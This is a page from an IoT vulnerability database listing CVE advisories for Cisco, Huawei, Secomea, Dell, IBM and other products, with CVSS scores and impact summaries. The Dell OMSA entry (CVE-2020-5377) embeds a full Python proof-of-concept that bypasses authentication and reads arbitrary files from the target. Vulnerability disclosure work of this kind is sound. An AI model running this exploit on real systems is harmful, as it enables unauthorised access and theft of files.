VARIoT IoT vulnerabilities database


VAR-202007-1049 CVE-2020-3383 Cisco Data Center Network Manager path traversal vulnerability CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
A vulnerability in the archive utility of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. The vulnerability is due to a lack of proper input validation of paths that are embedded within archive files. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to write arbitrary files in the system with the privileges of the logged-in user. The affected device may be put into a denial-of-service (DoS) state. Cisco Data Center Network Manager (DCNM) is a data center management system from Cisco. The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions.
VAR-202007-1261 CVE-2020-9248 Huawei FusionCompute improper authorization vulnerability CVSS V2: 4.6
CVSS V3: 6.7
Severity: MEDIUM
Huawei FusionCompute 8.0.0 has an improper authorization vulnerability. A module does not verify some input correctly and authorizes files with incorrect access. Attackers can exploit this vulnerability to launch a privilege escalation attack. This can compromise normal service. Information may be obtained or tampered with, and the service may be put into a denial-of-service (DoS) state. Huawei FusionCompute is a computer virtualization engine developed by Huawei in China. The product provides Virtual Resource Manager (VRM), Compute Node Agent (CNA), and other components. Attackers can use this vulnerability to elevate their privileges and affect the normal service of the device.
VAR-202007-1041 CVE-2020-3375 Cisco SD-WAN Solution software buffer error vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in Cisco SD-WAN Solution Software could allow an unauthenticated, remote attacker to cause a buffer overflow on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to gain access to information that they are not authorized to access, make changes to the system that they are not authorized to make, and execute commands on an affected system with privileges of the root user. The affected device may be put into a denial-of-service (DoS) state. Cisco SD-WAN Solution is a set of network expansion solutions from Cisco.
VAR-202007-1040 CVE-2020-3374 Cisco SD-WAN vManage Software improper authorization vulnerability CVSS V2: 9.0
CVSS V3: 9.9
Severity: CRITICAL
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization, enabling them to access sensitive information, modify the system configuration, or impact the availability of the affected system. The vulnerability is due to insufficient authorization checking on the affected system. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to gain privileges beyond what would normally be authorized for their configured user authorization level. The attacker may be able to access sensitive information, modify the system configuration, or impact the availability of the affected system. Information may be obtained or tampered with, and the system may be put into a denial-of-service (DoS) state. Cisco SD-WAN vManage Software is a management software for SD-WAN (Software Defined Wide Area Network) solutions from Cisco.
VAR-202008-0163 CVE-2020-14508 Multiple vulnerabilities in Secomea GateManager CVSS V2: 7.5
CVSS V3: 9.8
Severity: Critical
In GateManager versions prior to 9.2c, the affected product is vulnerable to an off-by-one error, which may allow an attacker to remotely execute arbitrary code or cause a denial-of-service condition. GateManager is a VPN server provided by Secomea. The following vulnerabilities exist in GateManager: improper neutralization of null byte or NUL character (CWE-158), CVE-2020-14500; off-by-one error (CWE-193), CVE-2020-14508; use of hard-coded credentials (CWE-798), CVE-2020-14510; use of insufficiently strong password hashes (CWE-916), CVE-2020-14512. The expected impact depends on the vulnerability: a remote third party may send a negative value and overwrite arbitrary data (CVE-2020-14500); a remote third party may trigger an off-by-one error and execute arbitrary code or cause a denial-of-service (DoS) condition (CVE-2020-14508); a remote third party without administrator privileges may use the hard-coded telnet credentials to execute commands with root privileges (CVE-2020-14510); a remote third party may view user passwords because a weak hash algorithm is used (CVE-2020-14512).
VAR-202008-1219 CVE-2020-14510 Secomea GateManager trust management issue vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: Critical
In GateManager versions prior to 9.2c, the affected product contains a hard-coded credential for telnet, allowing an unprivileged attacker to execute commands as root. GateManager is a VPN server provided by Secomea. The following vulnerabilities exist in GateManager: improper neutralization of null byte or NUL character (CWE-158), CVE-2020-14500; off-by-one error (CWE-193), CVE-2020-14508; use of hard-coded credentials (CWE-798), CVE-2020-14510; use of insufficiently strong password hashes (CWE-916), CVE-2020-14512. The expected impact depends on the vulnerability: a remote third party may send a negative value and overwrite arbitrary data (CVE-2020-14500); a remote third party may trigger an off-by-one error and execute arbitrary code or cause a denial-of-service (DoS) condition (CVE-2020-14508); a remote third party without administrator privileges may use the hard-coded telnet credentials to execute commands with root privileges (CVE-2020-14510); a remote third party may view user passwords because a weak hash algorithm is used (CVE-2020-14512). Secomea GateManager is a remote access server product of Secomea, Denmark. There is a trust management vulnerability in Secomea GateManager versions prior to 9.2c, which is caused by the program using hard-coded credentials. A remote attacker can use this vulnerability to execute commands with root privileges.
VAR-202008-0164 CVE-2020-14512 Multiple vulnerabilities in Secomea GateManager CVSS V2: 5.0
CVSS V3: 7.5
Severity: Critical
In GateManager versions prior to 9.2c, the affected product uses a weak hash type, which may allow an attacker to view user passwords. GateManager is a VPN server provided by Secomea. The following vulnerabilities exist in GateManager: improper neutralization of null byte or NUL character (CWE-158), CVE-2020-14500; off-by-one error (CWE-193), CVE-2020-14508; use of hard-coded credentials (CWE-798), CVE-2020-14510; use of insufficiently strong password hashes (CWE-916), CVE-2020-14512. The expected impact depends on the vulnerability: a remote third party may send a negative value and overwrite arbitrary data (CVE-2020-14500); a remote third party may trigger an off-by-one error and execute arbitrary code or cause a denial-of-service (DoS) condition (CVE-2020-14508); a remote third party without administrator privileges may use the hard-coded telnet credentials to execute commands with root privileges (CVE-2020-14510); a remote third party may view user passwords because a weak hash algorithm is used (CVE-2020-14512). Secomea GateManager is a remote access server product of Secomea, Denmark.
VAR-202008-0162 CVE-2020-14500 Multiple vulnerabilities in Secomea GateManager CVSS V2: 7.5
CVSS V3: 9.8
Severity: Critical
In all Secomea GateManager versions prior to 9.2c, an attacker can send a negative value and overwrite arbitrary data. GateManager is a VPN server provided by Secomea. The following vulnerabilities exist in GateManager: improper neutralization of null byte or NUL character (CWE-158), CVE-2020-14500; off-by-one error (CWE-193), CVE-2020-14508; use of hard-coded credentials (CWE-798), CVE-2020-14510; use of insufficiently strong password hashes (CWE-916), CVE-2020-14512. The expected impact depends on the vulnerability: a remote third party may send a negative value and overwrite arbitrary data (CVE-2020-14500); a remote third party may trigger an off-by-one error and execute arbitrary code or cause a denial-of-service (DoS) condition (CVE-2020-14508); a remote third party without administrator privileges may use the hard-coded telnet credentials to execute commands with root privileges (CVE-2020-14510); a remote third party may view user passwords because a weak hash algorithm is used (CVE-2020-14512).
VAR-202007-1286 CVE-2020-5377 Dell EMC OpenManage Server Administrator path traversal vulnerability CVSS V2: 6.4
CVSS V3: 9.1
Severity: CRITICAL
Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station. The solution supports online diagnosis, system operation detection, equipment management, etc. A remote attacker could exploit this vulnerability to gain access to the file system.

    # CVE: CVE-2020-5377
    # This is a proof of concept for CVE-2020-5377, an arbitrary file read in Dell OpenManage Administrator
    # Proof of concept written by: David Yesland @daveysec with Rhino Security Labs
    # More information can be found here:
    # A patch for this issue can be found here:
    # https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability

    from xml.sax.saxutils import escape
    import BaseHTTPServer
    import requests
    import thread
    import ssl
    import sys
    import re
    import os
    import urllib3

    urllib3.disable_warnings()

    if len(sys.argv) < 3:
        print 'Usage python auth_bypass.py <yourIP> <targetIP>:<targetPort>'
        exit()

    #This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909
    #Also check out https://github.com/hantwister/FakeDellOM
    class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        def do_POST(s):
            data = ''
            content_len = int(s.headers.getheader('content-length', 0))
            post_body = s.rfile.read(content_len)
            s.send_response(200)
            s.send_header("Content-type", "application/soap+xml;charset=UTF-8")
            s.end_headers()
            if "__00omacmd=getuserrightsonly" in post_body:
                data = escape("<SMStatus>0</SMStatus><UserRightsMask>458759</UserRightsMask>")
            if "__00omacmd=getaboutinfo " in post_body:
                data = escape("<ProductVersion>6.0.3</ProductVersion>")
            if data:
                requid = re.findall('>uuid:(.*?)<',post_body)[0]
                s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?>
    <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:n1="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule">
    <s:Header>
    <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>
    <wsa:RelatesTo>uuid:'''+requid+'''</wsa:RelatesTo>
    <wsa:MessageID>0d70cce2-05b9-45bb-b219-4fb81efba639</wsa:MessageID>
    </s:Header>
    <s:Body>
    <n1:SendCmd_OUTPUT>
    <n1:ResultCode>0</n1:ResultCode>
    <n1:ReturnValue>'''+data+'''</n1:ReturnValue>
    </n1:SendCmd_OUTPUT>
    </s:Body>
    </s:Envelope>''')
            else:
                s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>''')

        def log_message(self, format, *args):
            return

    createdCert = False
    if not os.path.isfile('./server.pem'):
        print '[-] No server.pem certifcate file found. Generating one...'
        os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"')
        createdCert = True

    def startServer():
        server_class = BaseHTTPServer.HTTPServer
        httpd = httpd = server_class(('0.0.0.0', 443), MyHandler)
        httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
        httpd.serve_forever()

    thread.start_new_thread(startServer,())

    myIP = sys.argv[1]
    target = sys.argv[2]

    def bypassAuth():
        values = {}
        url = "https://{}/LoginServlet?flag=true&managedws=false".format(target)
        data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"}
        r = requests.post(url, data=data, verify=False, allow_redirects=False)
        cookieheader = r.headers['Set-Cookie']
        sessionid = re.findall('JSESSIONID=(.*?);',cookieheader)
        pathid = re.findall('Path=/(.*?);',cookieheader)
        values['sessionid'] = sessionid[0]
        values['pathid'] = pathid[0]
        return values

    ids = bypassAuth()
    sessionid = ids['sessionid']
    pathid = ids['pathid']
    print "Session: "+sessionid
    print "VID: "+pathid

    def readFile(target,sessid,pathid):
        while True:
            file = raw_input('file > ')
            url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file)
            cookies = {"JSESSIONID": sessid}
            r = requests.get(url, cookies=cookies, verify=False)
            print 'Reading contents of {}:\n{}'.format(file,r.content)

    def getPath(path):
        if path.lower().startswith('c:\\'):
            path = path[2:]
        path = path.replace('\\','/')
        return path

    readFile(target,sessionid,pathid)
VAR-202007-1515 No CVE ZLAN5102 and ZLAN5103 serial server have a denial of service vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
ZLAN5102 and ZLAN5103 serial servers are industrial grade RS232/485 and TCP/IP protocol converters produced by Shanghai ZLAN. ZLAN5102 and ZLAN5103 serial servers have a denial of service vulnerability. Attackers can use this vulnerability to cause the device to restart.
VAR-202007-1510 No CVE Unauthorized access vulnerability exists in TVHeadend streaming media server CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Tvheadend is streaming media server software that runs on Linux systems. The Tvheadend streaming media server has an unauthorized access vulnerability. Attackers can use this vulnerability to obtain sensitive information.
VAR-202007-1391 CVE-2020-4465 Classic buffer overflow vulnerability in multiple IBM products CVSS V2: 4.0
CVSS V3: 6.5
Severity: MEDIUM
IBM MQ, IBM MQ Appliance, and IBM MQ for HPE NonStop 8.0, 9.1 CD, and 9.1 LTS are vulnerable to a buffer overflow due to an error within the channel processing code. A remote attacker could overflow the buffer using an older client and cause a denial of service. IBM X-Force ID: 181562. The vendor has published this vulnerability as IBM X-Force ID: 181562. The affected system may be put into a denial-of-service (DoS) state.
VAR-202007-1093 CVE-2020-4319 Information leakage vulnerability in multiple IBM products CVSS V2: 3.5
CVSS V3: 4.3
Severity: MEDIUM
IBM MQ, IBM MQ Appliance, and IBM MQ for HPE NonStop 8.0, 9.1 LTS, and 9.1 CD could, under special circumstances, allow an authenticated user to obtain sensitive information due to a data leak from an error message within the pre-v7 pubsub logic. IBM X-Force ID: 177402. The vendor has published this vulnerability as IBM X-Force ID: 177402. Information may be obtained.
VAR-202007-1084 CVE-2020-4375 Missing release of resource after effective lifetime vulnerability in multiple IBM products CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
IBM MQ, IBM MQ Appliance, IBM MQ for HPE NonStop 8.0, 9.1 CD, and 9.1 LTS could allow an attacker to cause a denial of service due to a memory leak caused by an error creating a dynamic queue. IBM X-Force ID: 179080. The vendor has published this vulnerability as IBM X-Force ID: 179080. The affected system may be put into a denial-of-service (DoS) state.
VAR-202007-0442 CVE-2019-4731 IBM MQ Appliance information leakage vulnerability CVSS V2: 2.1
CVSS V3: 5.5
Severity: MEDIUM
IBM MQ Appliance 9.1.4.CD could allow a local attacker to obtain highly sensitive information by inclusion of sensitive data within trace. IBM X-Force ID: 172616. IBM MQ Appliance contains an information leakage vulnerability. The vendor has published this vulnerability as IBM X-Force ID: 172616. Information may be obtained.
VAR-202007-0021 CVE-2020-10643 PI Vision cross-site scripting vulnerability CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
An authenticated remote attacker could use specially crafted URLs to send a victim using PI Vision 2019 mobile to a vulnerable web page due to a known issue in a third-party component. PI Vision contains a cross-site scripting vulnerability. Information may be obtained and tampered with.
VAR-202007-1564 No CVE Unauthorized access vulnerability exists in Tianyi Kandian camera CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Tianyi Kandian is a security service that integrates camera, video, real-time monitoring, PTZ control, alarm, and storage. Tianyi Kandian camera has an unauthorized access vulnerability, which can be exploited by attackers to obtain sensitive information.
VAR-202007-1509 No CVE ZLAN serial server has unauthorized access vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Shanghai ZLAN Information Technology Co., Ltd. is a high-tech enterprise providing industrial IoT solutions. The ZLAN serial server has an unauthorized access vulnerability. Attackers can use the vulnerability to log in to the web management interface without authorization.
VAR-202007-1486 No CVE Shenzhen Yichen Technology Co., Ltd. wireless router has an unauthorized access vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Shenzhen Yichen Technology Co., Ltd. is a manufacturer and operator of network and communication equipment. The wireless router of Shenzhen Yichen Technology Co., Ltd. has an unauthorized access vulnerability. Attackers can use the vulnerability to perform unauthorized operations.
VAR-202007-1381 CVE-2020-4498 IBM MQ Appliance information disclosure vulnerability CVSS V2: 2.1
CVSS V3: 4.4
Severity: MEDIUM
IBM MQ Appliance 9.1 LTS and 9.1 CD could allow a local privileged user to obtain highly sensitive information due to inclusion of data within trace files. IBM X-Force ID: 182118. IBM MQ Appliance contains an information leakage vulnerability. The vendor has published this vulnerability as IBM X-Force ID: 182118. Information may be obtained. IBM MQ Appliance is an all-in-one device from IBM in the United States for rapid deployment of enterprise-level messaging middleware. Local attackers can use this vulnerability to obtain highly sensitive information.